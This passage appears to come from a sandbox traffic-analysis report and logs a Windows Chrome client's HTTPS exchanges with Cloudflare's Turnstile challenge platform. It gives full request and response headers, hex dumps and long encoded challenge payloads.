                                                                              Data Ascii: UH2AfXiCSoV6WG5uW49xUHeYi3N1mWZvboyVkJJ3o5uCXYBxeaKHgKdhiXGpg6y2rqKZk4p7t7qdf72ysX2ampeYgZiDxMPHjayakNGoxbWyzsuirKXdrdiwus/P0NC1z7nUm7vp3uvAxNvMwO7r8KjrteXx8PTb3fr58fH41tnX/vTWw94F2c3s2tAS6Ab18g8M4dnj5+kV7SLxFvQlFebiGCQi6ecj+Av4KO3rCSbvLPQm8zgPDCk2PzY7/iQ
                                                                              2024-11-26 19:54:48 UTC1369INData Raw: 6f 79 44 6a 48 6c 79 6a 31 78 4e 62 47 68 32 64 48 65 4d 55 57 75 46 5a 70 4e 32 57 35 56 68 65 48 4e 63 58 6e 6d 46 5a 6f 70 32 61 71 32 4c 6b 49 6d 50 62 34 65 4b 69 37 47 34 63 70 61 46 63 33 57 7a 68 34 79 35 73 6e 79 7a 65 35 75 52 6d 62 75 30 73 34 69 72 6d 59 57 35 71 63 75 68 73 4a 53 52 69 64 47 53 79 36 32 4f 75 5a 53 79 72 4c 61 59 33 4d 37 47 33 74 7a 4a 73 75 72 6f 77 38 32 32 76 62 76 77 76 39 37 42 79 61 79 75 79 4d 79 36 36 39 6a 39 76 74 54 4f 31 73 4c 50 76 37 33 69 43 41 66 6e 78 4d 4c 56 33 65 50 35 30 41 7a 66 43 63 59 57 34 65 34 5a 30 65 6a 59 46 4e 62 31 43 68 6f 6a 32 2b 76 74 46 52 6b 46 38 2b 55 57 41 2b 7a 33 2b 4f 55 52 4a 51 63 78 45 41 38 6f 4a 52 49 51 45 42 6b 52 4f 51 77 56 2b 41 77 64 44 79 51 63 2f 51 55 71 4f 42 73 65
                                                                              Data Ascii: oyDjHlyj1xNbGh2dHeMUWuFZpN2W5VheHNcXnmFZop2aq2LkImPb4eKi7G4cpaFc3Wzh4y5snyze5uRmbu0s4irmYW5qcuhsJSRidGSy62OuZSyrLaY3M7G3tzJsurow822vbvwv97ByayuyMy669j9vtTO1sLPv73iCAfnxMLV3eP50AzfCcYW4e4Z0ejYFNb1Choj2+vtFRkF8+UWA+z3+OURJQcxEA8oJRIQEBkROQwV+AwdDyQc/QUqOBse


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.1649746104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:50 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:51 UTC379INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 26 Nov 2024 19:54:51 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: WvEytYT9oMbSv3XqNHd8iEP/7FTbM1+Ter8=$44PUflrL5NN21Cs0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6ec50ba47c6f-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:51 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.1649747104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:50 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8e8c6e9b1b1b437a/1732650888673/1F1YFoCiLDS1z55 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:51 UTC200INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:51 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6ec6ff9e1a0f-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 12 08 02 00 00 00 36 6e 72 3e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDR6nr>IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.1649749104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:52 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8e8c6e9b1b1b437a/1732650888673/83ef82c9ae1c1fab2ef43382ed78a78a49b63bd8d8160e9d4219cba19b858457/w15JzClzjgpXyEV HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:53 UTC143INHTTP/1.1 401 Unauthorized
                                                                              Date: Tue, 26 Nov 2024 19:54:53 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              2024-11-26 19:54:53 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 67 2d 2d 43 79 61 34 63 48 36 73 75 39 44 4f 43 37 58 69 6e 69 6b 6d 32 4f 39 6a 59 46 67 36 64 51 68 6e 4c 6f 5a 75 46 68 46 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gg--Cya4cH6su9DOC7Xinikm2O9jYFg6dQhnLoZuFhFcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                              2024-11-26 19:54:53 UTC1INData Raw: 4a
                                                                              Data Ascii: J


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.1649748104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:52 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8e8c6e9b1b1b437a/1732650888673/1F1YFoCiLDS1z55 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:53 UTC200INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:53 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6ed22950efa3-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 12 08 02 00 00 00 36 6e 72 3e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDR6nr>IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.1649750104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:55 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 31777
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:55 UTC16384OUTData Raw: 76 5f 38 65 38 63 36 65 39 62 31 62 31 62 34 33 37 61 3d 39 78 65 49 7a 35 37 64 59 67 68 47 78 47 33 35 66 47 48 47 6c 76 73 37 4c 47 75 47 6e 77 6c 68 34 78 47 52 47 68 77 47 34 6a 47 75 47 73 50 49 74 64 37 45 47 5a 77 74 5a 34 37 6f 50 33 47 74 70 47 37 31 47 50 30 4a 33 34 47 76 33 4a 35 33 72 48 41 47 77 47 53 74 47 73 54 47 7a 45 71 49 49 56 47 65 50 6a 47 4b 47 65 32 73 59 68 47 71 6a 47 74 79 33 67 54 37 52 74 6a 25 32 62 41 24 4f 2b 67 71 45 68 47 55 38 38 6c 39 77 47 55 41 47 5a 33 73 49 37 57 47 37 64 38 6e 77 37 67 73 70 65 33 47 35 64 47 43 5a 41 47 73 4c 35 59 66 48 7a 33 2b 6e 35 38 5a 67 33 74 47 74 71 78 66 6a 5a 76 47 47 54 56 6e 47 37 72 68 38 77 30 49 6c 33 47 71 54 36 74 63 72 57 4f 77 31 67 2b 56 5a 32 36 45 74 5a 66 58 75 53 2d 59
                                                                              Data Ascii: v_8e8c6e9b1b1b437a=9xeIz57dYghGxG35fGHGlvs7LGuGnwlh4xGRGhwG4jGuGsPItd7EGZwtZ47oP3GtpG71GP0J34Gv3J53rHAGwGStGsTGzEqIIVGePjGKGe2sYhGqjGty3gT7Rtj%2bA$O+gqEhGU88l9wGUAGZ3sI7WG7d8nw7gspe3G5dGCZAGsL5YfHz3+n58Zg3tGtqxfjZvGGTVnG7rh8w0Il3GqT6tcrWOw1g+VZ26EtZfXuS-Y
                                                                              2024-11-26 19:54:55 UTC15393OUTData Raw: 76 74 77 5a 37 5a 77 36 65 47 47 67 78 54 34 72 49 69 47 68 78 65 6f 76 47 35 71 49 42 77 6c 73 72 36 47 58 78 37 2d 70 38 65 2b 47 37 42 56 79 4f 65 47 47 63 35 6a 47 41 47 38 49 47 42 49 55 47 72 49 35 71 49 47 49 71 77 37 54 47 35 49 38 64 35 66 47 4b 47 47 6a 37 52 47 50 47 74 77 47 65 47 45 6a 39 6a 37 5a 6a 65 49 74 65 47 36 47 43 5a 6c 50 37 71 47 69 47 38 68 35 44 66 51 47 38 69 47 36 49 71 47 48 5a 47 78 47 33 77 37 7a 63 38 47 36 49 38 77 73 4d 47 4f 49 73 68 35 6d 49 68 47 74 49 37 49 47 6e 47 76 68 35 55 47 62 49 65 78 72 35 35 78 62 63 73 47 42 49 4c 47 77 4a 67 48 47 30 77 37 77 47 54 77 68 47 63 70 37 77 37 32 68 67 47 6c 65 47 4d 47 63 49 37 75 41 47 64 6c 47 47 2b 47 66 47 64 73 35 24 47 63 69 73 6f 61 59 47 75 47 47 49 72 37 47 70 47 79
                                                                              Data Ascii: vtwZ7Zw6eGGgxT4rIiGhxeovG5qIBwlsr6GXx7-p8e+G7BVyOeGGc5jGAG8IGBIUGrI5qIGIqw7TG5I8d5fGKGGj7RGPGtwGeGEj9j7ZjeIteG6GCZlP7qGiG8h5DfQG8iG6IqGHZGxG3w7zc8G6I8wsMGOIsh5mIhGtI7IGnGvh5UGbIexr55xbcsGBILGwJgHG0w7wGTwhGcp7w72hgGleGMGcI7uAGdlGG+GfGds5$GcisoaYGuGGIr7GpGy
                                                                              2024-11-26 19:54:56 UTC330INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:55 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 26376
                                                                              Connection: close
                                                                              cf-chl-gen: bNqX7rZU9V8Y7E7W/Yx4GWfYFJddNRL7FfnL2fADfLcoanYs3aOO/oLGryd3uakxpbRWULfomRtwZgP0$UFcqUh9KMIZKBaH4
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6ee0fdc242d8-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:56 UTC1039INData Raw: 57 49 52 43 64 6d 4a 2f 69 6e 46 75 58 6b 39 76 61 31 42 79 68 6d 56 78 55 33 74 37 56 32 68 2f 66 31 75 45 6e 49 4a 66 6b 71 53 54 6e 4a 6c 37 58 34 53 42 73 61 57 70 6a 48 53 6a 68 71 4f 6d 65 61 69 70 6d 4b 6d 79 66 38 47 70 6f 5a 43 41 72 35 53 2b 6f 4c 79 6f 75 73 6d 44 71 5a 2b 6e 6e 49 6d 39 30 6f 32 67 78 64 69 7a 74 36 53 30 76 4c 75 37 71 38 75 76 75 64 72 65 70 72 72 41 36 4d 44 6e 76 61 79 37 77 65 62 72 78 38 37 4c 72 75 2b 78 39 74 58 4d 36 37 58 37 76 76 54 53 76 76 79 39 33 62 37 77 76 64 6b 4b 43 4e 54 6a 42 75 44 46 2b 74 44 39 46 52 59 46 43 4e 38 45 36 78 73 63 43 76 54 71 38 50 72 71 32 53 54 32 34 50 58 32 34 69 63 42 2b 2f 54 34 49 2b 2f 74 48 65 73 7a 4d 43 49 70 43 66 45 6c 47 44 63 64 39 7a 67 58 4c 68 63 30 4e 44 77 61 45 6a 51
                                                                              Data Ascii: WIRCdmJ/inFuXk9va1ByhmVxU3t7V2h/f1uEnIJfkqSTnJl7X4SBsaWpjHSjhqOmeaipmKmyf8GpoZCAr5S+oLyousmDqZ+nnIm90o2gxdizt6S0vLu7q8uvudreprrA6MDnvay7webrx87Lru+x9tXM67X7vvTSvvy93b7wvdkKCNTjBuDF+tD9FRYFCN8E6xscCvTq8Prq2ST24PX24icB+/T4I+/tHeszMCIpCfElGDcd9zgXLhc0NDwaEjQ
                                                                              2024-11-26 19:54:56 UTC1369INData Raw: 54 6b 32 39 6f 68 35 4f 46 61 4a 65 57 6d 5a 5a 61 6d 34 39 67 6e 58 42 62 6f 48 64 31 68 6e 69 6a 67 71 53 45 68 6f 71 44 64 4a 43 44 68 71 39 7a 73 35 4f 47 66 35 57 50 65 4a 68 38 6c 61 61 59 67 36 53 6b 76 70 57 61 70 4d 71 50 69 6f 6d 76 78 4e 62 54 77 4d 65 6c 75 38 36 4f 6d 39 33 41 73 64 32 63 77 4a 61 62 6f 73 58 6e 36 65 6a 63 77 2b 4c 67 70 64 6a 4a 37 62 7a 4a 76 73 32 79 72 76 71 33 34 37 66 73 2b 64 2f 4b 76 39 48 58 38 66 50 54 42 77 44 55 35 76 33 32 79 4d 55 52 43 76 4c 71 35 67 6e 78 31 64 4c 4b 45 39 4d 4e 2f 65 30 55 32 50 44 75 37 67 2f 2b 4a 2f 45 62 42 78 2f 33 47 51 77 5a 4c 75 73 50 47 68 77 55 41 43 4d 78 42 43 63 4a 4f 41 38 4d 4c 52 73 5a 48 79 30 4f 2b 54 30 64 4a 44 63 47 51 51 51 63 4e 67 56 42 52 77 77 45 50 42 39 53 46 68
                                                                              Data Ascii: Tk29oh5OFaJeWmZZam49gnXBboHd1hnijgqSEhoqDdJCDhq9zs5OGf5WPeJh8laaYg6SkvpWapMqPiomvxNbTwMelu86Om93Asd2cwJabosXn6ejcw+LgpdjJ7bzJvs2yrvq347fs+d/Kv9HX8fPTBwDU5v32yMURCvLq5gnx1dLKE9MN/e0U2PDu7g/+J/EbBx/3GQwZLusPGhwUACMxBCcJOA8MLRsZHy0O+T0dJDcGQQQcNgVBRwwEPB9SFh
                                                                              2024-11-26 19:54:56 UTC1369INData Raw: 62 6e 56 34 6e 6c 6c 37 63 47 31 36 66 32 52 38 67 5a 78 35 6e 47 65 5a 62 59 39 38 73 48 36 43 6c 48 61 53 72 48 4b 4a 74 58 4f 39 65 4b 36 53 74 33 74 32 6e 4a 6e 47 68 4d 53 33 79 59 71 6f 77 4b 79 4c 71 73 4f 38 73 63 2f 4f 72 74 61 58 71 71 53 54 7a 4d 61 65 72 74 66 51 30 4c 66 67 70 4e 58 59 70 38 53 2b 36 61 61 2b 79 61 7a 49 77 4d 6a 6a 73 63 33 4a 32 4e 44 48 38 64 50 55 33 73 66 4e 33 38 2f 74 38 50 54 43 2f 62 72 6d 43 74 66 6c 42 39 67 49 45 51 7a 78 34 78 4d 43 43 4f 59 4b 44 41 7a 38 39 50 76 32 37 64 2f 32 49 75 45 55 34 42 38 42 47 51 6f 62 49 68 7a 73 37 41 41 50 48 41 59 6d 2f 54 4d 43 4c 53 63 61 4f 78 41 73 2b 45 41 57 51 51 38 33 2b 55 54 37 4f 43 6b 37 50 67 4d 70 51 30 56 43 49 6a 38 4e 4f 30 55 4c 56 52 4a 42 55 46 74 4a 48 42 73
                                                                              Data Ascii: bnV4nll7cG16f2R8gZx5nGeZbY98sH6ClHaSrHKJtXO9eK6St3t2nJnGhMS3yYqowKyLqsO8sc/OrtaXqqSTzMaertfQ0LfgpNXYp8S+6aa+yazIwMjjsc3J2NDH8dPU3sfN38/t8PTC/brmCtflB9gIEQzx4xMCCOYKDAz89Pv27d/2IuEU4B8BGQobIhzs7AAPHAYm/TMCLScaOxAs+EAWQQ83+UT7OCk7PgMpQ0VCIj8NO0ULVRJBUFtJHBs
                                                                              2024-11-26 19:54:56 UTC1369INData Raw: 58 65 43 63 34 52 6d 5a 4b 79 56 68 6f 69 43 69 70 31 6b 6b 35 4b 79 62 71 69 76 67 61 31 30 73 6f 71 4b 71 6e 4b 4c 6a 35 65 30 6a 5a 50 41 77 4a 32 59 79 38 69 45 70 4a 79 43 78 4b 71 79 71 36 72 57 77 35 47 58 78 4c 76 48 6d 63 36 70 6d 39 33 58 30 61 43 62 33 39 50 6d 75 2b 57 37 79 4f 33 6b 71 38 47 38 76 75 37 49 77 4e 4c 76 7a 75 50 58 38 39 7a 36 7a 2f 6e 4b 32 74 72 7a 32 2b 44 39 2f 76 72 53 79 67 50 63 42 74 62 73 36 76 37 4d 44 51 6b 58 34 2b 59 4d 47 64 48 52 42 67 67 56 43 4f 77 61 36 67 51 6d 35 42 76 78 33 75 45 6d 44 42 6a 70 43 42 6e 76 34 2f 44 73 46 42 51 6e 4f 43 4d 6f 4e 41 63 50 43 2f 51 4a 4b 67 30 37 49 51 45 59 46 67 68 45 49 52 51 68 42 52 34 4f 53 30 51 6d 4e 43 55 31 50 79 39 4c 49 69 63 78 56 78 77 58 46 6a 78 52 59 6b 41 65
                                                                              Data Ascii: XeCc4RmZKyVhoiCip1kk5Kybqivga10soqKqnKLj5e0jZPAwJ2Yy8iEpJyCxKqyq6rWw5GXxLvHmc6pm93X0aCb39Pmu+W7yO3kq8G8vu7IwNLvzuPX89z6z/nK2trz2+D9/vrSygPcBtbs6v7MDQkX4+YMGdHRBggVCOwa6gQm5Bvx3uEmDBjpCBnv4/DsFBQnOCMoNAcPC/QJKg07IQEYFghEIRQhBR4OS0QmNCU1Py9LIicxVxwXFjxRYkAe
                                                                              2024-11-26 19:54:56 UTC1369INData Raw: 65 44 64 35 69 50 67 6f 79 41 68 4b 32 69 71 58 4b 4c 73 48 6c 36 6d 62 32 6e 73 49 71 4d 64 4b 36 34 74 4c 4e 2b 68 61 72 43 6d 4d 43 64 70 34 33 45 6f 49 75 6b 77 61 58 43 70 4b 71 33 6b 38 7a 59 73 35 6e 54 33 62 62 57 6d 74 36 68 34 75 62 47 79 4d 43 34 79 36 79 6f 72 73 69 76 77 4d 48 64 73 50 62 47 75 4f 72 52 38 66 48 2b 74 39 44 41 30 2f 33 51 37 66 58 59 78 73 44 47 36 2f 7a 56 2f 73 44 35 42 51 48 78 79 76 54 71 79 4e 49 55 30 78 62 5a 44 50 33 38 46 42 59 5a 46 39 34 59 44 2f 51 56 48 50 6e 34 36 43 45 57 43 65 73 72 45 78 48 71 4c 78 63 4e 46 43 38 78 4f 77 6f 78 2b 66 73 4c 4e 52 48 37 4a 44 73 42 49 53 51 39 4b 79 54 39 53 42 34 2f 4d 54 34 4f 4c 54 35 4c 54 45 73 78 54 42 51 59 47 55 6f 62 55 78 64 59 51 6b 45 75 59 54 5a 53 4b 46 64 4c 5a
                                                                              Data Ascii: eDd5iPgoyAhK2iqXKLsHl6mb2nsIqMdK64tLN+harCmMCdp43EoIukwaXCpKq3k8zYs5nT3bbWmt6h4ubGyMC4y6yorsivwMHdsPbGuOrR8fH+t9DA0/3Q7fXYxsDG6/zV/sD5BQHxyvTqyNIU0xbZDP38FBYZF94YD/QVHPn46CEWCesrExHqLxcNFC8xOwox+fsLNRH7JDsBISQ9KyT9SB4/MT4OLT5LTEsxTBQYGUobUxdYQkEuYTZSKFdLZ
                                                                              2024-11-26 19:54:56 UTC1369INData Raw: 37 71 35 56 2f 72 61 69 48 69 4b 57 75 63 72 78 35 72 5a 61 63 6d 72 79 76 6a 38 53 31 6e 4d 71 6d 6f 71 4b 2b 6d 72 32 62 30 71 62 50 70 37 54 4d 7a 38 53 33 79 5a 69 38 75 36 66 49 77 64 48 5a 33 63 32 7a 72 39 66 48 33 65 48 64 76 75 48 43 32 64 75 71 30 61 6e 44 35 62 36 7a 7a 63 50 31 73 73 2f 48 78 67 48 56 32 63 48 41 32 4e 2f 4f 33 74 77 4b 78 51 66 34 2f 51 59 43 38 64 34 52 43 50 54 7a 43 67 59 45 35 68 59 4b 43 66 73 4f 33 4f 2f 77 44 68 66 61 4a 65 45 57 2f 67 55 44 4a 52 6a 33 4c 52 34 46 4d 77 38 4c 43 79 63 44 4a 67 51 37 44 7a 67 51 48 54 59 75 49 51 2f 2b 2b 69 55 36 4f 54 77 62 50 69 51 2b 4c 53 77 59 42 7a 45 76 45 78 42 41 52 56 59 53 4f 6b 63 61 53 43 30 70 55 52 63 7a 48 44 74 65 4e 54 45 37 49 44 52 72 59 57 73 39 4e 69 35 78 52 47
                                                                              Data Ascii: 7q5V/raiHiKWucrx5rZacmryvj8S1nMqmoqK+mr2b0qbPp7TMz8S3yZi8u6fIwdHZ3c2zr9fH3eHdvuHC2duq0anD5b6zzcP1ss/HxgHV2cHA2N/O3twKxQf4/QYC8d4RCPTzCgYE5hYKCfsO3O/wDhfaJeEW/gUDJRj3LR4FMw8LCycDJgQ7DzgQHTYuIQ/++iU6OTwbPiQ+LSwYBzEvExBARVYSOkcaSC0pURczHDteNTE7IDRrYWs9Ni5xRG
                                                                              2024-11-26 19:54:56 UTC1369INData Raw: 68 36 32 6e 6d 6e 56 32 71 4a 39 35 76 62 47 76 75 5a 4f 30 73 4b 62 4a 75 72 54 42 6c 37 32 34 72 35 2b 4d 74 4c 4c 56 7a 72 65 33 70 39 4f 37 6c 64 6e 50 77 4e 62 44 30 73 7a 44 33 64 48 48 74 75 6e 61 7a 4f 43 6d 33 74 76 6c 75 2b 4c 53 72 66 48 6e 32 4d 62 35 36 4e 76 62 7a 37 6a 67 7a 72 37 75 34 39 50 35 38 75 66 58 32 2f 6a 71 78 2b 2f 39 37 73 6e 53 42 50 4d 4b 44 67 4d 42 39 2b 4d 4c 43 42 4c 6e 47 41 48 76 38 78 45 46 47 75 38 55 43 51 6a 33 35 41 7a 6d 39 78 73 5a 44 79 34 68 46 53 6f 75 4b 42 6b 76 48 43 6b 63 39 66 6f 72 48 2f 6c 43 4d 43 50 39 51 6a 63 30 50 51 73 33 4c 53 74 4f 51 44 41 66 43 30 77 31 4d 31 49 52 4f 42 4a 61 54 44 31 52 48 30 74 42 4d 46 70 55 52 46 74 49 56 45 6c 65 58 6c 68 4d 53 32 70 66 57 56 42 45 61 32 42 71 51 47 46
                                                                              Data Ascii: h62nmnV2qJ95vbGvuZO0sKbJurTBl724r5+MtLLVzre3p9O7ldnPwNbD0szD3dHHtunazOCm3tvlu+LSrfHn2Mb56Nvbz7jgzr7u49P58ufX2/jqx+/97snSBPMKDgMB9+MLCBLnGAHv8xEFGu8UCQj35Azm9xsZDy4hFSouKBkvHCkc9forH/lCMCP9Qjc0PQs3LStOQDAfC0w1M1IROBJaTD1RH0tBMFpURFtIVEleXlhMS2pfWVBEa2BqQGF
